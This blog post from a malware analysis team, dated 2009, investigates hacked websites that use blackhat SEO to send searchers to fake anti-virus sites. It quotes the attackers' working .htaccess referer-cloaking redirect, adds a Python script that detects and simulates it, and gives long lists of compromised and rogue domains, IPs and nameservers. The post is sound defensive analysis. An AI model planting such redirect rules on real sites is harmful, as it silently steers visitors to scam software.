Monday, September 14, 2009

US Open and Video Music Awards top rogue anti-virus efforts

Saturday night I got an email from Brian Tanner, the leader of our UAB Malware Analysis team. Brian plays a bit of tennis, and was doing a search for the "US Open Finals Schedule" in Google, when he noticed some strange links in the top ten results. He wrote me a note to tell me that for some reason "conklinsystems.com" and "mauiwedding.net" were both showing up as top sites on Google for his search, but when he tried to follow either link, it took him to a fake anti-virus product instead.

After a little digging Monday morning, and with some helpful pointers from some fellow researchers, it looks like we have a fairly complete story of what's going on here.

On one level, we start with the fact that several web servers have been hacked and loaded up with pages stuffed with extremely powerful Search Engine Optimization terms, what we call "Black SEO" (blackhat SEO) in the community. In this case, the hackers have scraped the top headlines from news sites, then searched on those headlines to pull other related headlines, and generated web pages loaded with all of them. That's how they are getting into the top search results. By running Google searches with the "inurl:" and "site:" operators, we're able to pull a fairly complete list of the headlines being seeded by this Black SEO technique.

For example, here are three sites which are coming up regularly in the searches, with whatever string we are looking for showing up after the question mark in the URL:

conklinsystems.com/xmarks/index.php?(string)
mauiwedding.net/ssp_director/albums/?(string)
www.kerryjohnson.com/images/look/?(string)

Just as an example, I did the Google search:

inurl:look site:kerryjohnson.com US Open

and received 210 results, including:

Us Open Mens Final 2009
Us Open Final Schedule
Us Open 2009 Mens Final
Us Open Womens Final 2009
Us Open Final 2009
Roger Federer Us Open
Serena Williams Outburst Transcript
Us Open Final
You Tube Serena Wililams
Serena Williams Outburst What Did She Say
Serena Williams Outburst Video

Then I did the same search, without the "US Open" to learn what other headlines this Black SEO technique was trying to capture, and found these headlines:

Tory Shulman
Jay Z VMA
ESPN Boston
Roger Federer US Open
Megan Fox Thumb Pictures
Avaya Nortel
Chicago Bears 2009 schedule
Megan Fox VMA
Beyonce Twitter
VMA Outfits
New Moon Trailer 3 Leaked
Kay Perry Vma Dress
Lil Mama Vma
Kim Clijsters Baby
This is it
Music Awards Taylor Swift
Federer Between the Legs
Beyonce Vma 2009
Defying Gravity Cancelled
Jawbone 2 Review
The Ruins MTV
VMAs
Bears vs Packers
Lauren London Baby
Lauren London Baby Pictures
Pink Vmas

Students kindly informed me what VMAs are - apparently some people like watching music videos so much they have their own awards show, the Video Music Awards. Most of the top hits in the resulting headlines (more than 1,000 of them) from KerryJohnson.com were either for the VMAs or the US Open.

Some other sites, that we aren't going to dig into as deeply, include:

24blackbirds.net
86queensgate.com
desertstarlimo.com
envision-ren.com
filmgenius.com
harmonyhall.com
homeremediesweb.com
mawawrestling.ca
mcd4x4.com
packetslave.com
penupdesigns.com
real-ism.com
resilience-europe.com
saintbrigids.ca
sandpointidahoinfo.com
stuartkinmond.com
uglyoutfitsnyc.com
unchain-vu.net
vinhhuynh.com
yakultpuebla.com

Before going further, I'd like to acknowledge a pair of great articles from the Unmask Parasites blog:
Unmasking the Antivirus 2009 .htaccess Exploit
and
Bogus Antivirus 2009 .htaccess Exploit.

The "guts of it" are that the hacked site's Apache .htaccess includes:

RewriteEngine On
# Each condition is a case-insensitive ([NC]) substring match on the Referer
# header; [OR] chains them so any one of them is enough to fire the rule.
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
# Any request path (.*) is answered with an external redirect ([R], a 302 by
# default) to the attacker's site, and rule processing stops ([L]).
RewriteRule .* http://(BadSiteHere) [R,L]

What this means is that a visitor who types the URL in directly, including the site's own webmaster checking their pages, sees the legitimate page: the Referer header is empty, so no condition matches. A visitor who clicked through from Google, Yahoo, MSN, AOL, Ask or AltaVista carries a Referer that contains the engine's name, so the rule fires and sends them to the hacker's page instead. Two practical consequences follow. First, the infection is invisible to the owner and to any scanner that fetches pages without a search-engine Referer, so the check is to request the page twice, once with a Referer such as a google.com search URL and once without, and compare the responses. Second, the patterns are unanchored substring matches, so a referring site whose hostname merely contains "ask" or "aol" triggers the redirect as well, while a search engine that is not on the list (Bing, for instance) passes straight through.
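To make the cloaking behaviour concrete, here is an added example (my code, not from the original post or the Unmask Parasites write-ups) that parses a .htaccess file for an HTTP_REFERER condition chain ending in an external redirect, then evaluates that chain the way mod_rewrite does for a handful of referers. The .htaccess text is constructed to mirror the rules quoted above, and "badsite.example" is a placeholder for the redacted target. The probe_live helper at the end is the two-request check described above; it needs network access and is not exercised by the sample run.

```python
"""Referer cloaking: parse the .htaccess redirect chain and simulate it."""
import re
import urllib.error
import urllib.request
from dataclasses import dataclass, field

# Constructed sample mirroring the rule set quoted in the post;
# badsite.example stands in for the redirect target the post redacts.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://badsite.example/ [R,L]
"""

_COND = re.compile(r'RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?$')
_RULE = re.compile(r'RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$')


@dataclass
class RefererCloak:
    conditions: list = field(default_factory=list)  # (regex, has_OR) in file order
    target: str = ""


def _flags(s):
    # "R=301,L" -> {"R", "L"}; flag values are irrelevant for this check
    return {f.strip().upper().split('=')[0] for f in (s or '').split(',') if f.strip()}


def parse_referer_cloak(text):
    """Return the first HTTP_REFERER condition chain that ends in an external
    redirect (RewriteRule ... http://... [R]), or None. Only HTTP_REFERER
    conditions are modelled; that is all this attack uses."""
    conds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = _COND.match(line)
        if m:
            flags = _flags(m.group(2))
            regex = re.compile(m.group(1), re.I if 'NC' in flags else 0)
            conds.append((regex, 'OR' in flags))
            continue
        m = _RULE.match(line)
        if m:
            target, flags = m.group(2), _flags(m.group(3))
            external = target.startswith(('http://', 'https://'))
            if conds and (external or 'R' in flags):
                return RefererCloak(conds, target)
            conds = []  # a RewriteRule closes the condition chain either way
    return None


def referer_matches(cloak, referer):
    """Evaluate the chain like mod_rewrite: an [OR] condition is OR'd with the
    next one, conditions without [OR] are AND'd. Patterns are unanchored
    (search semantics), which is why .*ask.* also matches 'flask'."""
    referer = referer or ''  # direct visit: %{HTTP_REFERER} is empty
    result, group, open_group = True, False, False
    for regex, is_or in cloak.conditions:
        group = group or regex.search(referer) is not None
        open_group = True
        if not is_or:
            result, group, open_group = result and group, False, False
    if open_group:  # chain ended on an [OR] line
        result = result and group
    return result


def simulate_visit(cloak, referer):
    """Where the visitor lands: the redirect target when the chain matches,
    None when the real page is served."""
    return cloak.target if referer_matches(cloak, referer) else None


def probe_live(url, referer='http://www.google.com/search?q=test', timeout=10):
    """Live check (needs network): fetch url with and without a search-engine
    Referer, not following redirects, and return the two Location headers.
    A 3xx only on the referred request is the cloaking signature."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surface 3xx as HTTPError instead of following it

    opener = urllib.request.build_opener(NoRedirect)

    def fetch(headers):
        try:
            opener.open(urllib.request.Request(url, headers=headers), timeout=timeout)
            return None
        except urllib.error.HTTPError as e:
            return e.headers.get('Location') if 300 <= e.code < 400 else None

    return fetch({'Referer': referer}), fetch({})


if __name__ == '__main__':
    cloak = parse_referer_cloak(SAMPLE_HTACCESS)
    for ref in (None, 'http://www.google.com/search?q=US+Open+Final+Schedule',
                'http://www.bing.com/search?q=US+Open', 'http://flask.example/docs/'):
        print(f'{ref!r:58} -> {simulate_visit(cloak, ref)}')
```

The sample run shows the four cases that matter: a direct visit is served normally, a Google click-through is redirected, a Bing click-through slips past the list, and an unrelated referer containing "ask" is redirected as collateral damage. Running probe_live against a suspect page gives the same answer without needing shell access to read the .htaccess.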

Currently the main websites that web searchers are landing on are:

#1. best-virus-scanner5.com
#2. online-systemscan.net
#3. searchscan-online.com
#4. securityscantooldirect.com
#5. mysecuredsystem.net

#1. Best-virus-scanner5.com is hosted on the IP addresses 91.213.126.100 and 193.169.12.70.

Some of the live sites also hosted on 91.213.126.100 include:

best-virus-scanner5.com
clean-all-spyware01.com
clean-all-spyware10.com
fast-virus-scan01.com
fast-virus-scan2.com
fast-virus-scan7.com
fast-virus-scan9.com
remove-all-adware10.com
remove-all-spyware03.com
remove-all-spyware07.com

Several of those domains, including best-virus-scanner5.com, are also hosted on the IP address 193.169.12.70, which also hosts the following domains:

becomemybestfriend.com
bestinvestmentssolution.com
best-virus-scanner5.com
bravemousepride.com
chooseyourluck.com
clean-all-spyware01.com
clean-all-spyware10.com
fast-virus-scan01.com
fast-virus-scan2.com
fast-virus-scan7.com
fast-virus-scan9.com
getbestusprices.com
imbade-yourself.com
indianapolis-sales.com
jurassic-secrets.com
justintimberlakestream.com
justseethisonline.com
justthingsyouneedtoknow.com
lounge-officers.com
madonnasecretphoto.com
movies-hidden-places.com
newcellphones-overview.com
news-feedster.com
newsoverworldhot.com
obamanewterror.com
obbeytheriver.com
overviewforexbids.com
perky-videos.com
remove-all-adware01.com
remove-all-spyware03.com
remove-all-spyware07.com
spacestations-online.com
storyofthesuccess1.com

#2. online-systemscan.net was hosted on 64.86.16.11, a Canadian-based address belonging to Velcom, a customer of TATA Communications (AS6453).

That IP is also hosting:

gosearchguard.net
and
itgosearch.net

#3. searchscan-online.com was hosted on 64.86.16.9, also Velcom.

That IP is also hosting:

search-win.com
fastscan-protection.com
safetysystem-protect.com
go-searchandsecure.net


#4. securityscantooldirect.com was hosted on 62.90.136.237, an Israeli address belonging to "Loads Internet Solutions", a customer of Netvision.net.il (AS1680). How bold can they be? "Loading" is the term criminals use for merchandising and monetizing a botnet by using it to download other people's malware. "Loads" are the malware someone else pays you to put on your botnet.

That IP is also hosting:

securityscantoolguide.com
scantoolsite.com
safetyscantool.com
bestsecurityjobs.com
bestwebsitesecurity.com
yourcommunitysecurity.com

#5. mysecuredsystem.net was also on a Velcom IP address, 64.86.16.49.

That IP address was used to host:

searchsecureguard.com
mysecured-zone.com
ptotectmy-system.com
newscan-protect.com
windowsprotection-zone.net
fastsearchandsecure.net
mysecuredsystem.net
online-securescanner.net

Gee . . . at this point I'm tempted to scan this whole Class C (64.86.16.0/24) and see what other forms of badness reside there . . . Sadly, Velcom's phone number listed in their IP whois data has been disconnected or is not in service. We went ahead and called their upstream, who asked us to send them an email. Hello, TataCommunications! I hope you read this! Thank you for your help!

Here are some domains I found hosted on IPs 64.86.16.1 through 64.86.16.50:

checkviruszone.com
checkvirus-zone.com
fastscan-protection.com
fastsearchandsecure.net
go-scanandsecure.com
go-scanandsecure.net
goscan-protect.net
go-searchandprotect.com
go-searchandsecure.com
go-searchandsecure.net
gosearchguard.net
gosearch-protection.net
itgosearch.net
mysecuredsystem.com
mysecured-system.com
mysecuredsystem.net
mysecured-zone.com
mysecured-zone.net
mysecurityshield.net
newpcguard.net
newscan-protect.com
onlinescansystem.com
onlinescansystem.net
online-scansystem.net
onlinesearch-protection.com
onlinesecurescanner.net
online-securescanner.net
online-systemscan.com
online-systemscan.net
pconlinescan.net
protect-andsecure.com
protectand-secure.com
ptotectmy-system.com
safetysystem-guard.net
safetysystem-protect.com
safetysystem-protect.net
scanandsecure.net
scansystem-online.com
searchsafetyprotection.net
searchscan-online.com
searchsecureguard.com
search-win.com
systemguard-zone.com
systemscan-secure.com
virusfilter-zone.net
windowsprotection-zone.net

And here are some nameservers from the same range . . .

ns1.100booth.com
ns1.10gala.com
ns1.1ingeen.com
ns1.2009elf.com
ns1.2flipflop.com
ns1.7sevenseas.com
ns1.adriafin.com
ns1.adviceswarning.com
ns1.alleips.com
ns1.alphabet10.com
ns1.antivirusfilter-zone.com
ns1.applic137.net
ns1.as34as.com
ns1.ascoprguide.net
ns1.bestbewell.com
ns1.bigbestbbb.com
ns1.bigbestbbb.net
ns1.brovobing.com
ns1.casabl10.net
ns1.champions100.com
ns1.checkviruszone.net
ns1.checkvirus-zone.net
ns1.clarksinfact.com
ns1.cosmoset.net
ns1.coverlight.net
ns1.creamesfl.com
ns1.displayclub.net
ns1.displaylive.net
ns1.earring0.com
ns1.entrotus.com
ns1.factoria6.com
ns1.farfar5.com
ns1.fastantivir.net
ns1.fastscan-protection.com
ns1.fastsearchandsecure.net
ns1.fistano4r.com
ns1.freehostwap.com
ns1.gavaring1.com
ns1.go-checkvirus.com
ns1.go-checkvirus.net
ns1.goprotection.net
ns1.go-scanandprotect.com
ns1.go-scanandsearch.com
ns1.go-scanandsecure.com
ns1.goscansystem.com
ns1.go-scansystem.com
ns1.go-scansystem.net
ns1.go-searchandscan.net
ns1.go-searchandsecure.com
ns1.go-searchandsecure.net
ns1.gosearchguard.net
ns1.gosearchinweb.com
ns1.go-searchprotection.com
ns1.gosearch-protection.com
ns1.gosearch-protection.net
ns1.gosearchsecurity.net
ns1.gotomyprotectedzone.com
ns1.gotomyprotectedzone.net
ns1.gotospace7.com
ns1.go-virusscanner.com
ns1.hilotavus.com
ns1.hot2009.net
ns1.immitations-all.net
ns1.ironins.com
ns1.ispscenter.com
ns1.ispspartners.com
ns1.itgosearch.net
ns1.jetztips.com
ns1.lanacess.com
ns1.limestee.com
ns1.magnoliastr.com
ns1.mmdmm.net
ns1.mycataloge.com
ns1.myofficeguard.com
ns1.myonlineguard.com
ns1.myprotectedsystem.net
ns1.myprotected-zone.com
ns1.myprotectedzone.net
ns1.myprotected-zone.net
ns1.my-safetyprotection.net
ns1.mysecuredsystem.com
ns1.mysecured-system.com
ns1.mysecurityzone.net
ns1.mysystemdefender.com
ns1.mysystemguard.com
ns1.my-systemprotection.com
ns1.mysystemshield.com
ns1.mysystemshield.net
ns1.myvirusscanner.com
ns1.myvirusscanner.net
ns1.new-onlinescanner.com
ns1.new-onlinescanner.net
ns1.new-systemguard.com
ns1.new-systemguard.net
ns1.new-systemprotection.net
ns1.new-systemshield.com
ns1.onlineguardgo.com
ns1.online-scanandsecure.com
ns1.onlinescansystem.com
ns1.online-scansystem.com
ns1.onlinescansystem.net
ns1.online-scansystem.net
ns1.online-securescanner.com
ns1.onlinesecurescanner.net
ns1.onlinesystemscan.com
ns1.pconlinescan.net
ns1.pcscanneronline.net
ns1.protectedfield.com
ns1.protection-secure.com
ns1.protectionsecure.net
ns1.protectsystem.net
ns1.ptotectmy-system.com
ns1.realsystemguard.com
ns1.rumba200.com
ns1.safeguardshield.com
ns1.safetydefender.net
ns1.safetyscanner.net
ns1.safetysystem-guard.net
ns1.safetysystem-shield.com
ns1.safetysystem-shield.net
ns1.scanandprotect-zone.com
ns1.scanandsecure.net
ns1.scaninfo.net
ns1.scanonline-protect.net
ns1.scan-secure.com
ns1.scan-secure.net
ns1.scansystemonline.com
ns1.scansystem-online.com
ns1.scansystem-online.net
ns1.scan-virus.net
ns1.searchandprotect.net
ns1.searchdefender.net
ns1.searchpcguard.com
ns1.searchpcguard.net
ns1.searchsafetyprotection.net
ns1.searchscanner.net
ns1.searchscan-online.com
ns1.searchsecureguard.com
ns1.searchsecureshield.com
ns1.search-security.net
ns1.search-systemprotection.net
ns1.search-systemshield.com
ns1.search-win.com
ns1.securepcshield.com
ns1.secure-systemguard.com
ns1.securesystemguard.net
ns1.secure-systemshield.com
ns1.secure-systemshield.net
ns1.securitypath.net
ns1.shieldinfo.net
ns1.shieldsystem.net
ns1.system-protection.net
ns1.systemscan-secure.com
ns1.system-shield.com
ns1.system-shield.net
ns1.thelocatemissing.com
ns1.timeforfuck.com
ns1.ultimaguard.com
ns1.virusfilter-zone.net
ns1.webssearch.net
ns1.webssecurity.net
ns1.windowsprotection-suite.com
ns1.windows-protectonline.com
ns1.windows-protectonline.net
ns1.windows-systemguard.com
ns1.windows-systemshield.com
ns1.windows-systemshield.net
ns1.winprotectionsuite.com
ns1.winprotection-suite.net
ns1.winsecuritysuite-pro.com

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.